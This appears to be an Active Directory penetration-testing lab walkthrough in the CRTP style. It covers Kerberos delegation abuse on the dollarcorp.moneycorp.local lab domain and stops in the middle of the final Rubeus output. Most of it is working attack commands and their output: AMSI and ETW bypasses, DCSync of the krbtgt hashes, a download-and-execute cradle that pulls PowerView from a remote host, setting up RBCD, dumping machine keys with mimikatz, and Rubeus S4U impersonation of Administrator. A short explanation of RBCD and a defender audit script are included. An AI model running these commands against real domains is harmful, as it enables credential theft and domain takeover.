MDE3MzU0OFqoHBsaRE9MTEFSQ09SUC5NT05FWUNPUlAuTE9DQUypLzAtoAMCAQKhJjAkGwZrcmJ0Z3Qb
GmRvbGxhcmNvcnAubW9uZXljb3JwLmxvY2Fs

[*] Action: S4U

[*] Building S4U2self request for: 'DCORP-ADMINSRV$@DOLLARCORP.MONEYCORP.LOCAL'
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2self request to 172.16.2.1:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'DCORP-ADMINSRV$@DOLLARCORP.MONEYCORP.LOCAL'
[*] base64(ticket.kirbi):


[*] Impersonating user 'Administrator' to target SPN 'TIME/dcorp-dc.dollarcorp.moneycorp.LOCAL'


[*] Final ticket will be for the alternate service 'LDAP'
[*] Building S4U2proxy request for service: 'TIME/dcorp-dc.dollarcorp.moneycorp.LOCAL'
[*] Using domain controller: dcorp-dc.dollarcorp.moneycorp.local (172.16.2.1)
[*] Sending S4U2proxy request to domain controller 172.16.2.1:88
[+] S4U2proxy success!
[*] Substituting alternative service name 'LDAP'
[*] base64(ticket.kirbi) for SPN 'LDAP/dcorp-dc.dollarcorp.moneycorp.LOCAL':

[+] Ticket successfully imported!

C:\Windows\system32>klist

Current LogonId is 0:0x2125aa

Cached Tickets: (1)


#0> Client: Administrator @ DOLLARCORP.MONEYCORP.LOCAL
Server: LDAP/dcorp-dc.dollarcorp.moneycorp.LOCAL @ DOLLARCORP.MONEYCORP.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate
name_canonicalize
Start Time: 7/3/2024 10:35:49 (local)
End Time: 7/3/2024 20:35:48 (local)
Renew Time: 7/10/2024 10:35:48 (local)
Session Key Type: AES-128-CTS-HMAC-SHA1-96
Cache Flags: 0
Kdc Called:

C:\Windows\system32>C:\AD\Tools\Loader.exe -Path "C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe" "lsadump::dcsync /user:dcorp\krbtgt" "exit"
[+] Successfully unhooked ETW!
[+] Successfully patched AMSI!
[+] URL/PATH : C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe Arguments :
[+] Stolen from @harmj0y, @TheRealWover, @cobbr_io and @gentilkiwi, repurposed by @Flangvik and
@Mrtn9
[+] Randomizing strings in memory
[+] Suicide burn before CreateThread!

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 16:49:51


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # -Path
ERROR mimikatz_doLocal ; "-Path" command of "standard" module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz


cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe
ERROR mimikatz_doLocal ; "C:\AD\Tools\Old_Tools\BetterSafetyKatz.exe" command of "standard"
module not found !

Module : standard
Full name : Standard module
Description : Basic commands (does not require module name)

exit - Quit mimikatz


cls - Clear screen (doesn't work with redirections, like PsExec)
answer - Answer to the Ultimate Question of Life, the Universe, and Everything
coffee - Please, make me a coffee!
sleep - Sleep an amount of milliseconds
log - Log mimikatz input/output to file
base64 - Switch file input/output base64
version - Display some version informations
cd - Change or display current directory
localtime - Displays system local date and time (OJ command)
hostname - Displays system local hostname

mimikatz(commandline) # lsadump::dcsync /user:dcorp\krbtgt


[DC] 'dollarcorp.moneycorp.local' will be the domain
[DC] 'dcorp-dc.dollarcorp.moneycorp.local' will be the DC server
[DC] 'dcorp\krbtgt' will be the user account
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)

Object RDN : krbtgt

** SAM ACCOUNT **

SAM Username : krbtgt


Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 11/11/2022 10:59:41 PM
Object Security ID : S-1-5-21-719815819-3726368948-3917688648-502
Object Relative ID : 502

Credentials:
Hash NTLM: 4e9815869d2090ccfca61c1fe0d23986
ntlm- 0: 4e9815869d2090ccfca61c1fe0d23986
lm - 0: ea03581a1268674a828bde6ab09db837

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 6d4cc4edd46d8c3d3e59250c91eac2bd

* Primary:Kerberos-Newer-Keys *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848
aes128_hmac (4096) : e74fa5a9aa05b2c0b2d196e226d8820e
des_cbc_md5 (4096) : 150ea2e934ab6b80

* Primary:Kerberos *
Default Salt : DOLLARCORP.MONEYCORP.LOCALkrbtgt
Credentials
des_cbc_md5 : 150ea2e934ab6b80

* Packages *
NTLM-Strong-NTOWF

* Primary:WDigest *

mimikatz(commandline) # exit
Bye!

Resource based Constrained Delegation


Resource-based Constrained Delegation (RBCD) was introduced in Windows Server 2012.

In unconstrained and constrained Kerberos delegation, a computer or user is told which resources it can delegate authentication to.

In resource-based Kerberos delegation, the computers (resources) themselves specify whom they trust and who can delegate authentication to them. Resource-based delegation is controlled by the msDS-AllowedToActOnBehalfOfOtherIdentity attribute, which stores a security descriptor naming the objects allowed to act on behalf of other identities against the resource. Unlike the other delegation types, configuring it does not require Domain Admin privileges.

For our example, we have a user who is trying to authenticate to a backend database through a front-end web server. We assume that the user logs on to the Web Server using a non-Kerberos protocol such as NTLM or forms authentication.

Step-1: The user authenticates to the Web Server using a non-Kerberos protocol.

Step-2: Because the user authenticated to the Web Server with a non-Kerberos protocol, the user has no service ticket that the Web Server could use to invoke s4u2proxy.

Step-3: The Web Server, on behalf of the user, requests a service ticket using its own TGT, with the Web Server itself as the target service. This is s4u2self.

Step-4: The DC receives this request. In this case the Web Server does not have the "TRUSTED_TO_AUTH_FOR_DELEGATION" flag set, since this is not Constrained Delegation.

Step-5: Because the Web Server lacks the "TRUSTED_TO_AUTH_FOR_DELEGATION" flag, the DC issues a non-forwardable service ticket (one that cannot be used to access remote services) for the user to the Web Server. In Constrained Delegation the DC would instead send the Web Server a forwardable service ticket. By default, all service tickets are forwardable.

Step-6: The Web Server receives the service ticket and stores it.

Step-7: The Web Server, on behalf of the client, now requests a service ticket for the backend database. The request includes its own TGT and the non-forwardable service ticket it obtained through s4u2self. This is s4u2proxy.

Step-8: The DC receives the request from the Web Server, decrypts the s4u2self service ticket (along with the Web Server's TGT) and confirms that the user has authenticated to the Web Server.

Step-9: The DC then checks the msDS-AllowedToActOnBehalfOfOtherIdentity attribute on the database object to determine whether the Web Server is trusted for delegation. Once the DC determines that the Web Server is allowed to delegate, it issues a forwardable service ticket for the database.

Step-10: The Web Server presents the new service ticket to the Database server, which decrypts it.

Step-11: AP-REP using the mutual session key between the Database server and the Web Server.

Step-12: The Web Server responds to the user over the protocol with which the user originally authenticated.

Attacking Resource based constrained delegation


We would need two privileges:

• Write permissions on the target service or object, to configure msDS-AllowedToActOnBehalfOfOtherIdentity
• Control over an object which has an SPN configured (such as admin access to a domain-joined machine, or the ability to join a machine to the domain: ms-DS-MachineAccountQuota is 10 for all domain users by default)
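A defender-side audit for exactly these two prerequisites and for the msDS-AllowedToActOnBehalfOfOtherIdentity check the DC performs in the flow above, written for this page and not part of the CRTP lab tooling: it lists every computer whose attribute is populated, resolves the trusted SIDs and flags recent or unresolvable ones, and reports who can write the attribute on a given computer (the kind of GenericWrite finding ciadmin has on DCORP-MGMT). It assumes the RSAT ActiveDirectory module; the function names Get-RbcdTrust, Get-RbcdWriter and Convert-RbcdDescriptorToSid are my own.

```powershell
# Defender-side RBCD audit. Added example for this page; not part of the CRTP lab tooling.
# Assumes the RSAT ActiveDirectory module and read access to the domain partition.
Import-Module ActiveDirectory

# Normalise msDS-AllowedToActOnBehalfOfOtherIdentity to the list of allowed SIDs.
# ADWS returns the attribute as ActiveDirectorySecurity; raw LDAP clients return descriptor bytes.
function Convert-RbcdDescriptorToSid {
    param([Parameter(Mandatory)] $Descriptor)
    if ($Descriptor -is [System.DirectoryServices.ActiveDirectorySecurity]) {
        $rules = $Descriptor.GetAccessRules($true, $false, [System.Security.Principal.SecurityIdentifier])
        return @($rules | Where-Object { $_.AccessControlType -eq 'Allow' } |
                 ForEach-Object { $_.IdentityReference.Value })
    }
    $raw = New-Object System.Security.AccessControl.RawSecurityDescriptor -ArgumentList ([byte[]]$Descriptor), 0
    return @($raw.DiscretionaryAcl |
             Where-Object { $_.AceType -eq [System.Security.AccessControl.AceType]::AccessAllowed } |
             ForEach-Object { $_.SecurityIdentifier.Value })
}

# Every computer that trusts some principal to act on behalf of other identities (the same
# data Get-DomainRBCD shows), with the trusted principal resolved and flagged when it is
# unresolvable or was created recently, which is what an attacker-added machine account looks like.
function Get-RbcdTrust {
    param([string]$Server, [int]$RecentDays = 30)
    $ad = @{}
    if ($Server) { $ad.Server = $Server }

    $domain = Get-ADDomain @ad
    $quota  = (Get-ADObject -Identity $domain.DistinguishedName `
                 -Properties 'ms-DS-MachineAccountQuota' @ad).'ms-DS-MachineAccountQuota'

    $targets = Get-ADComputer -LDAPFilter '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' `
                 -Properties 'msDS-AllowedToActOnBehalfOfOtherIdentity' @ad

    foreach ($t in $targets) {
        $sids = Convert-RbcdDescriptorToSid -Descriptor $t.'msDS-AllowedToActOnBehalfOfOtherIdentity'
        foreach ($sid in $sids) {
            $p = Get-ADObject -Filter "objectSid -eq '$sid'" -Properties sAMAccountName, whenCreated @ad
            $name = '<unresolved SID>'; $class = $null; $created = $null
            if ($p) { $name = $p.sAMAccountName; $class = $p.ObjectClass; $created = $p.whenCreated }
            $recent = ($null -ne $created) -and ($created -gt (Get-Date).AddDays(-$RecentDays))
            [pscustomobject]@{
                Target           = $t.SamAccountName
                TrustedPrincipal = $name
                TrustedSid       = $sid
                PrincipalClass   = $class
                PrincipalCreated = $created
                MachineQuota     = $quota      # 10 (the default) lets any user add SPN-bearing computers
                Suspicious       = [bool]($recent -or -not $p)
            }
        }
    }
}

# Who can set that attribute on one computer object: the first prerequisite of the attack.
# Well-known admin principals are skipped; everything else holding a write right is reported.
function Get-RbcdWriter {
    param([Parameter(Mandatory)][string]$Identity, [string]$Server)
    $ad = @{}
    if ($Server) { $ad.Server = $Server }

    $computer = Get-ADComputer -Identity $Identity @ad
    # Resolve the attribute's schemaIDGUID from the schema instead of hard-coding it.
    $schemaNc = (Get-ADRootDSE @ad).schemaNamingContext
    $attr = Get-ADObject -SearchBase $schemaNc -Properties schemaIDGUID @ad `
              -LDAPFilter '(lDAPDisplayName=msDS-AllowedToActOnBehalfOfOtherIdentity)'
    $attrGuid = [guid]$attr.schemaIDGUID

    $trusted     = '^(NT AUTHORITY\\SYSTEM|BUILTIN\\Administrators|.+\\(Domain|Enterprise) Admins)$'
    $broadRights = [System.DirectoryServices.ActiveDirectoryRights]'GenericAll, GenericWrite, WriteDacl, WriteOwner'
    $writeProp   = [System.DirectoryServices.ActiveDirectoryRights]::WriteProperty

    $acl = Get-Acl -Path ('AD:\' + $computer.DistinguishedName)
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($ace.IdentityReference.Value -match $trusted) { continue }
        $broad    = ($ace.ActiveDirectoryRights -band $broadRights) -ne 0
        # WriteProperty counts when it covers all properties (empty GUID) or this attribute.
        $thisAttr = (($ace.ActiveDirectoryRights -band $writeProp) -ne 0) -and
                    ($ace.ObjectType -eq [guid]::Empty -or $ace.ObjectType -eq $attrGuid)
        if ($broad -or $thisAttr) {
            [pscustomobject]@{
                Target     = $computer.SamAccountName
                Principal  = $ace.IdentityReference.Value
                Rights     = $ace.ActiveDirectoryRights
                ObjectType = $ace.ObjectType
                Inherited  = $ace.IsInherited
            }
        }
    }
}

# Usage:
#   Get-RbcdTrust | Where-Object Suspicious | Format-Table -AutoSize
#   Get-RbcdWriter -Identity dcorp-mgmt | Format-Table -AutoSize
```

Both functions only read the directory; an unwanted entry is cleared with Set-ADComputer -PrincipalsAllowedToDelegateToAccount $null, and with Directory Service Changes auditing enabled a write to the attribute is logged as event ID 5136 on the DC.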

In our lab, the user ciadmin has write access on the domain object DCORP-MGMT.
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows
PS C:\Windows\system32> . C:\Ad\Tools\PowerView.ps1
PS C:\Windows\system32> Find-InterestingDomainAcl | ? {$_.identityreferencename -match 'ciadmin'}

ObjectDN : CN=DCORP-MGMT,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
AceQualifier : AccessAllowed
ActiveDirectoryRights : ListChildren, ReadProperty, GenericWrite
ObjectAceType : None
AceFlags : None
AceType : AccessAllowed
InheritanceFlags : None
SecurityIdentifier : S-1-5-21-719815819-3726368948-3917688648-1121
IdentityReferenceName : ciadmin
IdentityReferenceDomain : dollarcorp.moneycorp.local
IdentityReferenceDN : CN=ci admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
IdentityReferenceClass : user

We previously abused a Jenkins feature and obtained a foothold on the machine dcorp-ci as ciadmin. We will again get a foothold on dcorp-ci as ciadmin. To check whether Resource-based Constrained Delegation is already configured, we load PowerView and use the function Get-DomainRBCD.
PS C:\Users\Administrator\.jenkins\workspace\Project9> iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.163/PowerView.ps1'))
PS C:\Users\Administrator\.jenkins\workspace\Project9> Get-DomainRBCD

Since we did not get any results, RBCD is not yet configured and we configure it ourselves. Because we have administrator access to our student machine, we specify our machine account (dcorp-std163$) as the principal allowed to impersonate other users to dcorp-mgmt.
PS C:\Users\Administrator\.jenkins\workspace\Project9> Set-DomainRBCD -Identity dcorp-mgmt -DelegateFrom 'dcorp-std163$'
PS C:\Users\Administrator\.jenkins\workspace\Project9> Get-DomainRBCD

SourceName : DCORP-MGMT$
SourceType : MACHINE_ACCOUNT
SourceSID : S-1-5-21-719815819-3726368948-3917688648-1108
SourceAccountControl : WORKSTATION_TRUST_ACCOUNT
SourceDistinguishedName : CN=DCORP-MGMT,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
ServicePrincipalName : {WSMAN/dcorp-mgmt, WSMAN/dcorp-mgmt.dollarcorp.moneycorp.local,
TERMSRV/DCORP-MGMT,
TERMSRV/dcorp-mgmt.dollarcorp.moneycorp.local...}
DelegatedName : DCORP-STD163$
DelegatedType : MACHINE_ACCOUNT
DelegatedSID : S-1-5-21-719815819-3726368948-3917688648-13683
DelegatedAccountControl : WORKSTATION_TRUST_ACCOUNT
DelegatedDistinguishedName : CN=DCORP-STD163,OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local

The output can be read as follows: if we compromise the machine DCORP-STD163, we can access any service on DCORP-MGMT as any user, including a domain admin.

For this we will dump the password and Kerberos keys of our student machine account.
C:\Windows\system32>C:\Ad\Tools\InviShell\RunWithPathAsAdmin.bat

C:\Windows\system32>set COR_ENABLE_PROFILING=1

C:\Windows\system32>set COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db}

C:\Windows\system32>set COR_PROFILER_PATH=C:\AD\Tools\InviShell\InShellProf.dll

C:\Windows\system32>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\Windows\system32> . C:\Ad\Tools\Invoke-MimiEx.ps1
PS C:\Windows\system32> Invoke-Mimi -Command '"sekurlsa::ekeys"'

.#####. mimikatz 2.2.0 (x64) #19041 Dec 23 2022 18:36:14


.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(powershell) # sekurlsa::ekeys

Authentication Id : 0 ; 2158197 (00000000:0020ee75)


Session : Interactive from 3
User Name : DWM-3
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/3/2024 10:21:55 AM
SID : S-1-5-90-0-3

* Username : DCORP-STD163$
* Domain : dollarcorp.moneycorp.local
* Password : t'pk[af`3?)Y`IZ,]S9fUSmvIFpy;._:Tf&v("W+yi'[+B)K=9,[uars=FKSX37rnZ0P-
*B8ZvRhAeO )_&K_<@=q7ys%kRG[9<KwNQ](t&0UcLHNvzD!"A=
* Key List :
aes256_hmac 2fd4ad55aab4413f8dfdfcc25f6ef7747cc182139936ab32ef82f16e3720ca28
aes128_hmac 7cd3da92d5c41d040fa0f0b228d564fb
rc4_hmac_nt 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old 75e1e5ec9a9f15290d40cd1b04fede35
rc4_md4 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_nt_exp 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old_exp 75e1e5ec9a9f15290d40cd1b04fede35

Authentication Id : 0 ; 43328 (00000000:0000a940)


Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/3/2024 8:03:04 AM
SID : S-1-5-90-0-1

* Username : DCORP-STD163$
* Domain : dollarcorp.moneycorp.local
* Password : t'pk[af`3?)Y`IZ,]S9fUSmvIFpy;._:Tf&v("W+yi'[+B)K=9,[uars=FKSX37rnZ0P-
*B8ZvRhAeO )_&K_<@=q7ys%kRG[9<KwNQ](t&0UcLHNvzD!"A=
* Key List :
aes256_hmac 2fd4ad55aab4413f8dfdfcc25f6ef7747cc182139936ab32ef82f16e3720ca28
aes128_hmac 7cd3da92d5c41d040fa0f0b228d564fb
rc4_hmac_nt 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old 75e1e5ec9a9f15290d40cd1b04fede35
rc4_md4 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_nt_exp 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old_exp 75e1e5ec9a9f15290d40cd1b04fede35

Authentication Id : 0 ; 996 (00000000:000003e4)


Session : Service from 0
User Name : DCORP-STD163$
Domain : dcorp
Logon Server : (null)
Logon Time : 7/3/2024 8:03:03 AM
SID : S-1-5-20

* Username : dcorp-std163$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 58e2540d3c585257e36efe54009a6f2024c68dcced255254d25c4d0d812da2d2
rc4_hmac_nt 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old 75e1e5ec9a9f15290d40cd1b04fede35
rc4_md4 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_nt_exp 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old_exp 75e1e5ec9a9f15290d40cd1b04fede35

Authentication Id : 0 ; 7928062 (00000000:0078f8fe)


Session : Interactive from 0
User Name : student163
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/3/2024 10:06:27 PM
SID : S-1-5-21-719815819-3726368948-3917688648-13603

* Username : student163
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 8226ea65b512e5ff7e08814ae667503fc85993af3bc5932d92a8afe41760f868
rc4_hmac_nt ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_hmac_old ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_md4 ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_hmac_nt_exp ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_hmac_old_exp ccbca8c20310dbc0c5c9dcf1fde108b8

Authentication Id : 0 ; 7413497 (00000000:00711ef9)


Session : Interactive from 0
User Name : student163
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/3/2024 9:06:31 PM
SID : S-1-5-21-719815819-3726368948-3917688648-13603

* Username : student163
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 8226ea65b512e5ff7e08814ae667503fc85993af3bc5932d92a8afe41760f868
rc4_hmac_nt ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_hmac_old ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_md4 ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_hmac_nt_exp ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_hmac_old_exp ccbca8c20310dbc0c5c9dcf1fde108b8

Authentication Id : 0 ; 2172513 (00000000:00212661)


Session : RemoteInteractive from 3
User Name : student163
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/3/2024 10:21:56 AM
SID : S-1-5-21-719815819-3726368948-3917688648-13603

* Username : student163
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 8226ea65b512e5ff7e08814ae667503fc85993af3bc5932d92a8afe41760f868
rc4_hmac_nt ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_hmac_old ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_md4 ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_hmac_nt_exp ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_hmac_old_exp ccbca8c20310dbc0c5c9dcf1fde108b8

Authentication Id : 0 ; 2172330 (00000000:002125aa)


Session : RemoteInteractive from 3
User Name : student163
Domain : dcorp
Logon Server : DCORP-DC
Logon Time : 7/3/2024 10:21:56 AM
SID : S-1-5-21-719815819-3726368948-3917688648-13603

* Username : student163
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 8226ea65b512e5ff7e08814ae667503fc85993af3bc5932d92a8afe41760f868
rc4_hmac_nt ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_hmac_old ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_md4 ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_hmac_nt_exp ccbca8c20310dbc0c5c9dcf1fde108b8
rc4_hmac_old_exp ccbca8c20310dbc0c5c9dcf1fde108b8

Authentication Id : 0 ; 2158170 (00000000:0020ee5a)


Session : Interactive from 3
User Name : DWM-3
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/3/2024 10:21:55 AM
SID : S-1-5-90-0-3

* Username : DCORP-STD163$
* Domain : dollarcorp.moneycorp.local
* Password : t'pk[af`3?)Y`IZ,]S9fUSmvIFpy;._:Tf&v("W+yi'[+B)K=9,[uars=FKSX37rnZ0P-
*B8ZvRhAeO )_&K_<@=q7ys%kRG[9<KwNQ](t&0UcLHNvzD!"A=
* Key List :
aes256_hmac 2fd4ad55aab4413f8dfdfcc25f6ef7747cc182139936ab32ef82f16e3720ca28
aes128_hmac 7cd3da92d5c41d040fa0f0b228d564fb
rc4_hmac_nt 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old 75e1e5ec9a9f15290d40cd1b04fede35
rc4_md4 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_nt_exp 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old_exp 75e1e5ec9a9f15290d40cd1b04fede35

Authentication Id : 0 ; 2157108 (00000000:0020ea34)


Session : Interactive from 3
User Name : UMFD-3
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 7/3/2024 10:21:55 AM
SID : S-1-5-96-0-3

* Username : DCORP-STD163$
* Domain : dollarcorp.moneycorp.local
* Password : t'pk[af`3?)Y`IZ,]S9fUSmvIFpy;._:Tf&v("W+yi'[+B)K=9,[uars=FKSX37rnZ0P-
*B8ZvRhAeO )_&K_<@=q7ys%kRG[9<KwNQ](t&0UcLHNvzD!"A=
* Key List :
aes256_hmac 2fd4ad55aab4413f8dfdfcc25f6ef7747cc182139936ab32ef82f16e3720ca28
aes128_hmac 7cd3da92d5c41d040fa0f0b228d564fb
rc4_hmac_nt 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old 75e1e5ec9a9f15290d40cd1b04fede35
rc4_md4 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_nt_exp 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old_exp 75e1e5ec9a9f15290d40cd1b04fede35

Authentication Id : 0 ; 43395 (00000000:0000a983)


Session : Interactive from 1
User Name : DWM-1
Domain : Window Manager
Logon Server : (null)
Logon Time : 7/3/2024 8:03:04 AM
SID : S-1-5-90-0-1

* Username : DCORP-STD163$
* Domain : dollarcorp.moneycorp.local
* Password : t'pk[af`3?)Y`IZ,]S9fUSmvIFpy;._:Tf&v("W+yi'[+B)K=9,[uars=FKSX37rnZ0P-
*B8ZvRhAeO )_&K_<@=q7ys%kRG[9<KwNQ](t&0UcLHNvzD!"A=
* Key List :
aes256_hmac 2fd4ad55aab4413f8dfdfcc25f6ef7747cc182139936ab32ef82f16e3720ca28
aes128_hmac 7cd3da92d5c41d040fa0f0b228d564fb
rc4_hmac_nt 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old 75e1e5ec9a9f15290d40cd1b04fede35
rc4_md4 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_nt_exp 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old_exp 75e1e5ec9a9f15290d40cd1b04fede35

Authentication Id : 0 ; 24385 (00000000:00005f41)


Session : Interactive from 0
User Name : UMFD-0
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 7/3/2024 8:03:03 AM
SID : S-1-5-96-0-0
* Username : DCORP-STD163$
* Domain : dollarcorp.moneycorp.local
* Password : t'pk[af`3?)Y`IZ,]S9fUSmvIFpy;._:Tf&v("W+yi'[+B)K=9,[uars=FKSX37rnZ0P-
*B8ZvRhAeO )_&K_<@=q7ys%kRG[9<KwNQ](t&0UcLHNvzD!"A=
* Key List :
aes256_hmac 2fd4ad55aab4413f8dfdfcc25f6ef7747cc182139936ab32ef82f16e3720ca28
aes128_hmac 7cd3da92d5c41d040fa0f0b228d564fb
rc4_hmac_nt 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old 75e1e5ec9a9f15290d40cd1b04fede35
rc4_md4 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_nt_exp 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old_exp 75e1e5ec9a9f15290d40cd1b04fede35

Authentication Id : 0 ; 24347 (00000000:00005f1b)


Session : Interactive from 1
User Name : UMFD-1
Domain : Font Driver Host
Logon Server : (null)
Logon Time : 7/3/2024 8:03:03 AM
SID : S-1-5-96-0-1

* Username : DCORP-STD163$
* Domain : dollarcorp.moneycorp.local
* Password : t'pk[af`3?)Y`IZ,]S9fUSmvIFpy;._:Tf&v("W+yi'[+B)K=9,[uars=FKSX37rnZ0P-
*B8ZvRhAeO )_&K_<@=q7ys%kRG[9<KwNQ](t&0UcLHNvzD!"A=
* Key List :
aes256_hmac 2fd4ad55aab4413f8dfdfcc25f6ef7747cc182139936ab32ef82f16e3720ca28
aes128_hmac 7cd3da92d5c41d040fa0f0b228d564fb
rc4_hmac_nt 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old 75e1e5ec9a9f15290d40cd1b04fede35
rc4_md4 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_nt_exp 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old_exp 75e1e5ec9a9f15290d40cd1b04fede35

Authentication Id : 0 ; 999 (00000000:000003e7)


Session : UndefinedLogonType from 0
User Name : DCORP-STD163$
Domain : dcorp
Logon Server : (null)
Logon Time : 7/3/2024 8:03:03 AM
SID : S-1-5-18

* Username : dcorp-std163$
* Domain : DOLLARCORP.MONEYCORP.LOCAL
* Password : (null)
* Key List :
aes256_hmac 58e2540d3c585257e36efe54009a6f2024c68dcced255254d25c4d0d812da2d2
rc4_hmac_nt 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old 75e1e5ec9a9f15290d40cd1b04fede35
rc4_md4 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_nt_exp 75e1e5ec9a9f15290d40cd1b04fede35
rc4_hmac_old_exp 75e1e5ec9a9f15290d40cd1b04fede35

We will now use the AES-256 key of the machine account dcorp-std163$ to impersonate a domain administrator and access resources on the machine dcorp-mgmt.
C:\Windows\system32>C:\AD\Tools\Rubeus.exe s4u /user:DCORP-STD163$ /aes256:58e2540d3c585257e36efe54009a6f2024c68dcced255254d25c4d0d812da2d2 /impersonateuser:Administrator /msdsspn:http/dcorp-mgmt.dollarcorp.moneycorp.local /ptt

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v2.2.1

[*] Action: S4U

[*] Using aes256_cts_hmac_sha1 hash:


